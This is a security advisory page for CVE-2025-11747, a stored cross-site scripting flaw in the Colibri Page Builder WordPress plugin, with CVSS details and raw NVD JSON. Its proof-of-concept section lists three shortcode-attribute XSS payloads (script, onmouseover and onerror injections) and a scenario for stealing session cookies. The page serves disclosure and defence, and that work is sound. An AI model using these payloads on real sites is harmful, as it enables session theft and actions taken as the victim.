Security Vulnerability Report
中文
CVE-2025-11747 CVSS 6.4 MEDIUM

CVE-2025-11747

Published: 2025-12-19 09:15:46
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the colibri_blog_posts shortcode in all versions up to, and including, 1.0.345 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Colibri Page Builder WordPress插件 <= 1.0.345

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11747 PoC - Stored XSS in Colibri Page Builder // Author: [email protected] // Affected: Colibri Page Builder <= 1.0.345 // Method 1: Via WordPress Shortcode (requires Contributor+ access) // Add this shortcode to any WordPress page/post: [colibri_blog_posts category='"><script>alert(document.cookie)</script>'] // Method 2: Via category attribute injection [colibri_blog_posts category='test" onmouseover="alert(1)" x='] // Method 3: Via posts parameter [colibri_blog_posts posts='<img src=x onerror=alert(document.domain)>'] // Exploitation scenario: // 1. Attacker with Contributor role creates/edits a post // 2. Inserts malicious shortcode with XSS payload // 3. Saves/publishes the post // 4. Any user viewing the post will execute the injected JS // 5. Attacker can steal session cookies, perform actions as victim // Reference: https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11747", "sourceIdentifier": "[email protected]", "published": "2025-12-19T09:15:45.963", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Colibri Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the colibri_blog_posts shortcode in all versions up to, and including, 1.0.345 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php#L251", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3421590/colibri-page-builder/trunk/extend-builder/shortcodes/blog-posts.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e3305b39-5f7b-493b-80b5-cb925c2710c1?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.